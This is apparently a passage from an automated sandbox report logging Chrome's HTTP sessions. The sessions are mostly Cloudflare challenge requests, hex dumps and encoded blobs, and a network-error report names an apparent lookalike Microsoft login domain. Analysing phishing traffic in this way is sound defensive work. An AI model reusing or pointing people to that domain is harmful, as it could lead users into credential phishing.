                                                                                                                              Data Ascii: 4gmqslIWMdbGyj5eXdZt8m6B7w3mDuZDAvp+rgsybl6Gkm9G0p9LRoNnCyM+SzMzAoJ7X17/hnKflxt/I2uug7s3evsnv8MjzqvPj0bn35+3a0cLkv/HG2t3owcTZ5+/e4gnk7eXqEs3VFQzX6fLq+9L4FhMQF/H6GBP44ewKAubrBP38Nv0PKe74OPIMBzz5FQtBGwMPHEkoGwNMPCMFJSwsHSRKIi1KM01EGhNNVBIvPzEzLiRBOCNTM2UjOE
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 69 72 53 72 64 58 71 30 73 6e 6d 58 66 71 48 42 67 63 47 61 67 72 4b 30 70 6f 43 4b 74 4d 47 46 79 4d 79 77 69 63 47 6d 70 61 54 4f 73 35 66 57 73 4b 53 5a 79 62 75 2f 77 4e 66 4b 77 63 7a 62 6f 71 54 66 32 36 65 39 32 4f 4c 4b 72 65 54 4a 7a 38 6a 6b 35 39 48 31 72 76 4c 4e 30 2f 58 78 79 75 72 65 37 74 37 4e 32 76 58 42 75 51 50 37 78 4c 33 49 78 73 55 4b 38 4f 73 46 38 77 6e 7a 31 75 62 31 31 68 62 79 38 74 77 4b 46 51 6b 6a 44 67 45 43 42 39 2f 6d 41 52 6e 6e 33 53 77 72 41 75 6a 76 4c 42 77 47 41 54 41 67 4f 50 59 7a 44 77 37 37 4f 76 6b 62 44 55 45 37 51 52 56 46 51 53 55 46 4e 77 6b 61 44 45 6f 4d 55 52 74 50 49 30 55 73 56 45 6c 45 53 53 70 51 57 54 6b 65 48 7a 70 4a 4d 57 4d 34 52 54 64 41 5a 6c 34 33 52 54 51 70 52 45 64 66 53 55 59 77 61 47 6c
                                                                                                                              Data Ascii: irSrdXq0snmXfqHBgcGagrK0poCKtMGFyMywicGmpaTOs5fWsKSZybu/wNfKwczboqTf26e92OLKreTJz8jk59H1rvLN0/Xxyure7t7N2vXBuQP7xL3IxsUK8OsF8wnz1ub11hby8twKFQkjDgECB9/mARnn3SwrAujvLBwGATAgOPYzDw77OvkbDUE7QRVFQSUFNwkaDEoMURtPI0UsVElESSpQWTkeHzpJMWM4RTdAZl43RTQpREdfSUYwaGl
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 70 79 55 72 34 6a 43 77 58 79 63 6d 62 4a 2b 68 62 2f 43 74 61 65 73 67 4c 43 43 30 70 32 73 73 64 4b 6c 7a 61 4f 35 31 64 48 49 78 74 75 73 75 4b 6d 2f 35 4c 37 4f 70 4a 6d 30 31 36 69 71 77 37 72 48 78 73 71 36 77 71 33 41 76 39 58 33 79 74 72 4a 78 4f 62 38 75 39 65 36 39 72 6f 41 77 2f 75 38 32 66 6e 65 43 74 76 38 36 41 62 4b 41 51 48 70 2f 76 77 4f 42 2b 38 4e 30 39 44 35 37 66 67 65 45 42 63 61 48 52 33 73 47 2f 6f 67 4a 53 67 69 47 51 63 62 4a 4f 55 72 44 2f 30 51 4d 43 77 6c 45 51 76 32 39 69 73 59 42 78 45 4a 4b 7a 77 75 4f 69 59 78 4e 7a 55 66 52 66 77 6f 4a 41 63 6a 4a 52 42 4d 42 56 52 55 4b 55 73 6f 55 54 41 56 4d 45 39 5a 47 6d 46 4e 4f 42 35 54 49 6c 6f 37 61 46 56 58 52 31 77 71 54 46 31 76 58 57 34 37 5a 54 4a 46 4e 55 74 70 57 57 68 37
                                                                                                                              Data Ascii: pyUr4jCwXycmbJ+hb/CtaesgLCC0p2ssdKlzaO51dHIxtusuKm/5L7OpJm016iqw7rHxsq6wq3Av9X3ytrJxOb8u9e69roAw/u82fneCtv86AbKAQHp/vwOB+8N09D57fgeEBcaHR3sG/ogJSgiGQcbJOUrD/0QMCwlEQv29isYBxEJKzwuOiYxNzUfRfwoJAcjJRBMBVRUKUsoUTAVME9ZGmFNOB5TIlo7aFVXR1wqTF1vXW47ZTJFNUtpWWh7
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 71 6b 70 48 69 2b 65 6f 6d 62 77 36 79 6b 69 34 6d 6b 69 61 4c 46 76 35 43 31 6b 73 75 56 30 70 48 49 71 74 79 70 74 73 6d 78 76 39 79 67 30 72 48 64 70 65 4b 68 31 65 4f 67 38 4c 79 71 30 74 54 70 76 74 44 51 35 62 50 56 39 38 76 4f 31 75 65 32 32 4f 32 38 2b 51 58 69 78 76 58 59 39 2b 44 30 76 2b 44 50 41 78 50 6f 33 76 48 4d 45 2f 66 53 44 2b 54 54 43 77 6b 67 2b 75 73 69 39 66 72 30 49 75 54 78 4a 68 54 6a 39 43 77 57 2b 41 34 47 4a 65 38 64 41 53 33 76 4c 41 33 31 4e 78 77 74 39 6b 44 2b 4f 51 38 30 2f 68 41 55 4e 6b 59 43 4e 69 4e 43 47 67 41 39 4c 42 73 49 4b 68 41 6b 49 55 45 71 4f 42 4a 51 52 43 70 4a 50 52 49 73 56 56 5a 68 50 52 30 77 52 6b 68 4c 4e 6a 6c 66 4a 47 74 48 55 44 78 75 54 31 4e 70 5a 54 55 7a 54 47 64 62 64 6e 68 4b 50 30 42 56 68
                                                                                                                              Data Ascii: qkpHi+eombw6yki4mkiaLFv5C1ksuV0pHIqtyptsmxv9yg0rHdpeKh1eOg8Lyq0tTpvtDQ5bPV98vO1ue22O28+QXixvXY9+D0v+DPAxPo3vHME/fSD+TTCwkg+usi9fr0IuTxJhTj9CwW+A4GJe8dAS3vLA31Nxwt9kD+OQ80/hAUNkYCNiNCGgA9LBsIKhAkIUEqOBJQRCpJPRIsVVZhPR0wRkhLNjlfJGtHUDxuT1NpZTUzTGdbdnhKP0BVh
                                                                                                                              2024-10-04 13:11:04 UTC1369INData Raw: 36 6c 4b 4f 63 78 4c 65 65 77 4d 69 37 6f 73 54 47 6b 74 54 4f 75 62 69 39 74 35 6a 65 34 4a 36 68 74 4e 36 65 6e 39 6d 31 35 39 58 64 36 73 72 57 72 62 6a 4a 34 65 66 79 34 65 33 44 72 38 2b 34 73 74 50 76 36 76 37 78 77 64 66 52 35 4e 48 50 77 74 33 63 35 41 49 42 33 50 37 6e 35 74 7a 73 7a 51 34 48 44 68 62 55 45 2f 76 6b 2f 42 37 6d 38 2f 6f 63 48 76 50 79 45 41 6a 30 39 66 7a 30 2b 53 44 32 35 41 45 49 36 65 6b 67 44 67 34 45 43 67 6b 51 4e 53 54 32 50 6a 51 78 44 54 6f 54 51 44 49 32 4a 6b 55 53 4e 68 30 34 54 54 38 4e 4c 67 70 42 49 79 59 73 51 7a 45 7a 4f 43 64 55 55 45 55 56 51 42 77 38 51 6a 4e 54 51 6c 70 49 4d 6c 70 59 56 43 5a 66 50 47 4e 76 54 55 56 67 4b 7a 4e 4d 5a 6d 74 53 53 30 51 7a 52 6a 74 55 64 58 46 50 63 55 4e 33 54 6e 31 67 64 49
                                                                                                                              Data Ascii: 6lKOcxLeewMi7osTGktTOubi9t5je4J6htN6en9m159Xd6srWrbjJ4efy4e3Dr8+4stPv6v7xwdfR5NHPwt3c5AIB3P7n5tzszQ4HDhbUE/vk/B7m8/ocHvPyEAj09fz0+SD25AEI6ekgDg4ECgkQNST2PjQxDToTQDI2JkUSNh04TT8NLgpBIyYsQzEzOCdUUEUVQBw8QjNTQlpIMlpYVCZfPGNvTUVgKzNMZmtSS0QzRjtUdXFPcUN3Tn1gdI


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              29192.168.2.174979835.190.80.14432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:04 UTC496OUTPOST /report/v4?s=Va%2FhMvJ%2BULxr9QQUl%2FAnbXp44pJpY83RbfEN3pWoGNvpBV36eftnvnMSYNi9Pr%2BRv8q3W7lIuMj0jIC1lVnWJmvPejCcJRKHydTiqe6DXGiRrptfgoRS27BprLuGPjEU1bABTV72Rtns1zC%2BpST2 HTTP/1.1
                                                                                                                              Host: a.nel.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 451
                                                                                                                              Content-Type: application/reports+json
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:04 UTC451OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 36 37 34 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 32 36 2e 31 33 2e 36 39 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 6c 30 67 69 6e 2d 6d 69 63 72 6f 73 6f 2e 66 74 6c
                                                                                                                              Data Ascii: [{"age":0,"body":{"elapsed_time":674,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.26.13.69","status_code":405,"type":"http.error"},"type":"network-error","url":"https://l0gin-microso.ftl
                                                                                                                              2024-10-04 13:11:04 UTC168INHTTP/1.1 200 OK
                                                                                                                              Content-Length: 0
                                                                                                                              date: Fri, 04 Oct 2024 13:11:04 GMT
                                                                                                                              Via: 1.1 google
                                                                                                                              Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                              Connection: close


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              30192.168.2.1749799104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:05 UTC486OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/147669712:1728044744:0OaiWMyJW7ZPxlqedXMft6P244b4nMflF1Cf4AK8E-k/8cd56a630cf741e3/fc3fc94e9e3547a HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:05 UTC349INHTTP/1.1 404 Not Found
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:05 GMT
                                                                                                                              Content-Type: application/json
                                                                                                                              Content-Length: 7
                                                                                                                              Connection: close
                                                                                                                              cf-chl-out: PWLXgaJDLE27pSu3T4xa7t6dW6j7j0GRqiE=$Daohbmu9MW1icFpa
                                                                                                                              cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a739e050f3d-EWR
                                                                                                                              2024-10-04 13:11:05 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                                                                                              Data Ascii: invalid


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              31192.168.2.1749800104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:05 UTC785OUTGET /cdn-cgi/challenge-platform/h/g/i/8cd56a630cf741e3/1728047464607/YBBtqSrR-kb7LqJ HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: no-cors
                                                                                                                              Sec-Fetch-Dest: image
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:06 UTC170INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:05 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a762ea54262-EWR
                                                                                                                              2024-10-04 13:11:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 45 00 00 00 1c 08 02 00 00 00 b8 6e e5 41 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDREnAIDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              32192.168.2.1749801104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:06 UTC428OUTGET /cdn-cgi/challenge-platform/h/g/i/8cd56a630cf741e3/1728047464607/YBBtqSrR-kb7LqJ HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: none
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:06 UTC170INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:06 GMT
                                                                                                                              Content-Type: image/png
                                                                                                                              Content-Length: 61
                                                                                                                              Connection: close
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a7a3804433e-EWR
                                                                                                                              2024-10-04 13:11:06 UTC61INData Raw: 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 00 45 00 00 00 1c 08 02 00 00 00 b8 6e e5 41 00 00 00 04 49 44 41 54 00 00 00 01 9d 24 d7 91 00 00 00 00 49 45 4e 44 ae 42 60 82
                                                                                                                              Data Ascii: PNGIHDREnAIDAT$IENDB`


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              33192.168.2.1749802104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:07 UTC814OUTGET /cdn-cgi/challenge-platform/h/g/pat/8cd56a630cf741e3/1728047464610/6315a5703f342bce662661e8fa8e5cfbec36c51d90ea70cfa211f89c976d3430/n-8rMprBONH9scU HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Cache-Control: max-age=0
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:07 UTC143INHTTP/1.1 401 Unauthorized
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:07 GMT
                                                                                                                              Content-Type: text/plain; charset=UTF-8
                                                                                                                              Content-Length: 1
                                                                                                                              Connection: close
                                                                                                                              2024-10-04 13:11:07 UTC1985INData Raw: 77 77 77 2d 61 75 74 68 65 6e 74 69 63 61 74 65 3a 20 50 72 69 76 61 74 65 54 6f 6b 65 6e 20 63 68 61 6c 6c 65 6e 67 65 3d 22 41 41 49 41 47 58 42 68 64 43 31 70 63 33 4e 31 5a 58 49 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 67 59 78 57 6c 63 44 38 30 4b 38 35 6d 4a 6d 48 6f 2d 6f 35 63 2d 2d 77 32 78 52 32 51 36 6e 44 50 6f 68 48 34 6e 4a 64 74 4e 44 41 41 47 57 4e 6f 59 57 78 73 5a 57 35 6e 5a 58 4d 75 59 32 78 76 64 57 52 6d 62 47 46 79 5a 53 35 6a 62 32 30 3d 22 2c 20 74 6f 6b 65 6e 2d 6b 65 79 3d 22 4d 49 49 42 55 6a 41 39 42 67 6b 71 68 6b 69 47 39 77 30 42 41 51 6f 77 4d 4b 41 4e 4d 41 73 47 43 57 43 47 53 41 46 6c 41 77 51 43 41 71 45 61 4d 42 67 47 43 53 71 47 53 49 62 33 44 51 45 42 43 44 41 4c 42 67 6c 67 68 6b 67 42 5a 51 4d
                                                                                                                              Data Ascii: www-authenticate: PrivateToken challenge="AAIAGXBhdC1pc3N1ZXIuY2xvdWRmbGFyZS5jb20gYxWlcD80K85mJmHo-o5c--w2xR2Q6nDPohH4nJdtNDAAGWNoYWxsZW5nZXMuY2xvdWRmbGFyZS5jb20=", token-key="MIIBUjA9BgkqhkiG9w0BAQowMKANMAsGCWCGSAFlAwQCAqEaMBgGCSqGSIb3DQEBCDALBglghkgBZQM
                                                                                                                              2024-10-04 13:11:07 UTC1INData Raw: 4a
                                                                                                                              Data Ascii: J


                                                                                                                              Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                              34192.168.2.1749803104.18.95.414432980C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                              TimestampBytes transferredDirectionData
                                                                                                                              2024-10-04 13:11:07 UTC926OUTPOST /cdn-cgi/challenge-platform/h/g/flow/ov1/147669712:1728044744:0OaiWMyJW7ZPxlqedXMft6P244b4nMflF1Cf4AK8E-k/8cd56a630cf741e3/fc3fc94e9e3547a HTTP/1.1
                                                                                                                              Host: challenges.cloudflare.com
                                                                                                                              Connection: keep-alive
                                                                                                                              Content-Length: 32063
                                                                                                                              sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                              Content-type: application/x-www-form-urlencoded
                                                                                                                              sec-ch-ua-mobile: ?0
                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                              CF-Challenge: fc3fc94e9e3547a
                                                                                                                              sec-ch-ua-platform: "Windows"
                                                                                                                              Accept: */*
                                                                                                                              Origin: https://challenges.cloudflare.com
                                                                                                                              Sec-Fetch-Site: same-origin
                                                                                                                              Sec-Fetch-Mode: cors
                                                                                                                              Sec-Fetch-Dest: empty
                                                                                                                              Referer: https://challenges.cloudflare.com/cdn-cgi/challenge-platform/h/g/turnstile/if/ov2/av0/rcv0/0/bth64/0x4AAAAAAAwd9hw5rvoDjM7I/auto/fbE/normal/auto/
                                                                                                                              Accept-Encoding: gzip, deflate, br
                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                              2024-10-04 13:11:07 UTC16384OUTData Raw: 76 5f 38 63 64 35 36 61 36 33 30 63 66 37 34 31 65 33 3d 56 73 6b 4c 2d 42 66 76 53 38 53 4e 71 4a 30 63 48 63 51 38 6b 66 6f 63 61 63 55 63 6c 24 63 76 30 66 43 63 62 24 33 54 66 58 71 4c 58 24 42 30 66 37 63 77 52 6a 73 24 63 6f 6c 41 4f 4c 4b 52 33 72 72 63 41 45 24 66 46 63 38 71 66 45 4e 31 52 63 5a 71 4c 66 71 6b 76 44 6f 24 66 54 63 79 4c 42 6c 63 73 72 72 37 4c 63 57 63 6a 58 51 63 75 69 69 63 58 33 72 54 4c 43 51 75 63 41 71 63 56 42 48 78 56 49 24 63 66 74 4c 66 25 32 62 6c 4a 4e 6c 63 51 52 66 55 63 66 77 43 6f 24 77 63 52 6e 6c 63 41 52 24 4a 4b 67 4e 6b 44 6e 74 63 42 62 6c 4a 71 46 31 24 44 4b 77 71 4c 4a 72 73 51 42 77 64 63 4c 66 4e 71 6e 6c 45 71 4c 63 55 75 53 35 34 67 54 43 59 53 61 37 78 54 72 5a 34 30 2d 5a 33 64 61 55 65 75 6e 6c 4c
                                                                                                                              Data Ascii: v_8cd56a630cf741e3=VskL-BfvS8SNqJ0cHcQ8kfocacUcl$cv0fCcb$3TfXqLX$B0f7cwRjs$colAOLKR3rrcAE$fFc8qfEN1RcZqLfqkvDo$fTcyLBlcsrr7LcWcjXQcuiicX3rTLCQucAqcVBHxVI$cftLf%2blJNlcQRfUcfwCo$wcRnlcAR$JKgNkDntcBblJqF1$DKwqLJrsQBwdcLfNqnlEqLcUuS54gTCYSa7xTrZ40-Z3daUeunlL
                                                                                                                              2024-10-04 13:11:07 UTC15679OUTData Raw: 50 71 52 4e 6f 54 73 46 57 6b 24 63 65 63 62 52 4b 53 63 63 6a 62 43 53 4c 42 49 72 42 6b 66 6b 4c 63 63 6e 44 61 54 6d 71 33 46 4e 42 24 53 63 6c 50 42 35 63 62 4c 54 57 66 44 63 34 65 4e 52 37 74 63 52 63 6f 63 4a 75 4c 4a 4c 6a 48 6f 6b 63 5a 63 51 4c 42 35 63 6a 52 53 24 63 31 6b 2b 24 56 5a 2d 6c 63 55 72 46 36 4e 54 63 79 63 4a 6e 78 59 63 63 4c 4e 71 63 4c 63 51 76 4a 52 66 6b 63 34 63 38 71 63 54 4c 48 63 4e 45 63 73 63 54 4c 54 57 66 69 63 45 4c 4a 4c 63 31 52 62 63 4a 6b 42 38 63 48 4c 42 63 4e 31 63 75 63 6e 30 63 54 63 69 6b 6b 6c 66 71 63 48 63 56 42 63 53 63 7a 74 54 24 63 6f 7a 4a 6b 38 4a 73 54 4c 49 4c 4e 2d 42 34 63 71 50 56 24 4e 31 63 38 2d 33 31 4c 54 63 53 24 41 6a 4c 54 63 64 4c 54 57 42 48 63 6e 63 63 63 63 7a 48 55 41 38 42 48 63
                                                                                                                              Data Ascii: PqRNoTsFWk$cecbRKSccjbCSLBIrBkfkLccnDaTmq3FNB$SclPB5cbLTWfDc4eNR7tcRcocJuLJLjHokcZcQLB5cjRS$c1k+$VZ-lcUrF6NTcycJnxYccLNqcLcQvJRfkc4c8qcTLHcNEcscTLTWficELJLc1RbcJkB8cHLBcN1cucn0cTcikklfqcHcVBcScztT$cozJk8JsTLILN-B4cqPV$N1c8-31LTcS$AjLTcdLTWBHcncccczHUA8BHc
                                                                                                                              2024-10-04 13:11:08 UTC927INHTTP/1.1 200 OK
                                                                                                                              Date: Fri, 04 Oct 2024 13:11:08 GMT
                                                                                                                              Content-Type: text/html; charset=UTF-8
                                                                                                                              Content-Length: 4552
                                                                                                                              Connection: close
                                                                                                                              cf-chl-out-s: BFosrQZAx0QhfUlLefTcxUGD1dMi4RUgnqijV58G3zHaB89C7dxqmVcmiH1h8aVxUTAKujk9qi7zOUfLp1ODJOtQL9+6m9e6ZrtSDyGR79blCtKzGtT99MfMFgqnMGyaPS+XKEP2s+bUJDZZWYsf/mLPaNh+rtu9Swj1wAt3/qBsZNaTX6th+o1c528KZOHZdKrG622ue4+cryH8PHZWXAAxbAHMJALk/kPj9iN6vHeCojSKJVp0uO99xIv624U8AcGGxHSXzLFrkuueTuxqo55KrWrpe/5basHU+xgdKTT6phB6n6SY7LO9ircV4Rqu/Jq61dKK+vfNqpWaSj1nn5LgFmlRfrMSJ2vUuK3U1d2Ndxoy6enOQtlzbpcZF5d3mIeIAcF3KrwDy2vBqK40KjVDcxsrKWlpAFG2tWOpjZGh2TeAEMYyvwMMQZtaI6FQjGgRFg6LDEmdb8EAWXxVzAoRaQG237ol3kMxQHTccyBE6wgD93dIzY+DS/TuthJX6JffMImiXqFf04PesDnE3qiE67ONvYclsZ28bERk2Asj$hUCmlCF32boa7u0U
                                                                                                                              cf-chl-out: NBzvusCXtaHHx8vTI9AqjP+aLqsnBkbddGU2qINVE4W/4zy4yKcUoSji5MhaaFpB44jX9BKnY23eCSFiUXCPjq5qPCSxGWYZX5cunlWTGURVRZ+vPjBYF4o=$XnX/g1lOm17U5CIO
                                                                                                                              Server: cloudflare
                                                                                                                              CF-RAY: 8cd56a82e89032ca-EWR
                                                                                                                              2024-10-04 13:11:08 UTC442INData Raw: 6a 4c 71 70 71 6e 70 38 6d 72 57 6d 6c 71 71 7a 70 33 37 42 76 4d 65 47 6f 73 76 41 6f 6f 36 65 78 37 61 50 6d 64 6e 53 33 72 62 4a 6d 4c 4c 63 77 37 57 34 7a 38 69 33 32 2b 66 63 77 4e 36 35 34 4d 54 69 75 2f 44 55 39 62 58 7a 34 64 62 4d 30 4f 7a 65 36 62 75 2f 75 2b 71 37 78 50 72 2b 78 66 4d 42 35 2b 73 42 7a 41 67 49 7a 2f 72 6b 45 65 6a 79 33 76 4c 6f 43 65 63 62 37 68 37 79 49 42 6a 76 39 50 6a 68 48 69 4c 6d 39 69 72 36 46 69 45 70 37 52 34 75 37 76 34 51 4a 43 49 4f 4c 52 6e 32 4e 7a 51 6c 48 43 6f 32 2b 2f 6f 5a 46 42 30 5a 49 6a 6b 69 48 6a 73 5a 50 44 6b 58 49 68 6f 79 4d 53 55 66 54 45 30 6e 45 6b 4e 4b 55 7a 41 35 53 43 41 30 56 45 34 78 5a 69 46 51 4f 30 42 47 53 7a 63 6d 4c 6d 6c 59 62 43 70 75 5a 43 38 7a 4d 57 4a 30 4f 47 67 30 4d 7a 74
                                                                                                                              Data Ascii: jLqpqnp8mrWmlqqzp37BvMeGosvAoo6ex7aPmdnS3rbJmLLcw7W4z8i32+fcwN654MTiu/DU9bXz4dbM0Oze6bu/u+q7xPr+xfMB5+sBzAgIz/rkEejy3vLoCecb7h7yIBjv9PjhHiLm9ir6FiEp7R4u7v4QJCIOLRn2NzQlHCo2+/oZFB0ZIjkiHjsZPDkXIhoyMSUfTE0nEkNKUzA5SCA0VE4xZiFQO0BGSzcmLmlYbCpuZC8zMWJ0OGg0Mzt
                                                                                                                              2024-10-04 13:11:08 UTC1369INData Raw: 33 30 2b 66 62 4d 7a 77 6a 6d 44 65 76 6c 31 63 38 42 31 4e 6a 38 45 74 6a 72 37 4e 6b 6a 49 2f 51 4f 34 4e 77 46 38 69 67 65 42 2f 76 70 4c 65 38 4a 37 43 45 48 44 75 73 4e 4a 76 67 45 38 52 63 4c 43 52 6f 52 4e 78 55 31 51 44 41 47 52 67 45 30 48 53 4e 47 4f 42 63 50 55 55 6b 6d 4a 52 52 56 54 30 55 51 46 53 63 61 55 46 64 4c 4d 6c 38 31 51 32 51 36 56 69 59 68 49 47 6c 63 52 44 56 46 4f 57 5a 42 53 69 6c 41 51 6b 6b 74 62 55 4a 53 52 54 4e 4b 56 56 70 4d 55 6c 67 35 63 6c 5a 59 63 33 4a 2b 61 6b 4a 58 5a 48 39 4f 59 56 32 4d 65 33 43 56 64 6f 52 32 6b 49 32 5a 68 58 5a 6f 6a 35 47 59 62 58 35 33 66 58 4b 56 65 34 56 36 6d 33 65 4b 65 4b 4b 61 70 61 57 6b 68 72 4b 57 68 49 4b 4e 70 6e 4b 6c 6c 37 53 50 6e 62 4b 32 6f 35 65 36 73 61 53 50 75 62 36 62 71
                                                                                                                              Data Ascii: 30+fbMzwjmDevl1c8B1Nj8Etjr7NkjI/QO4NwF8igeB/vpLe8J7CEHDusNJvgE8RcLCRoRNxU1QDAGRgE0HSNGOBcPUUkmJRRVT0UQFScaUFdLMl81Q2Q6ViYhIGlcRDVFOWZBSilAQkktbUJSRTNKVVpMUlg5clZYc3J+akJXZH9OYV2Me3CVdoR2kI2ZhXZoj5GYbX53fXKVe4V6m3eKeKKapaWkhrKWhIKNpnKll7SPnbK2o5e6saSPub6bq
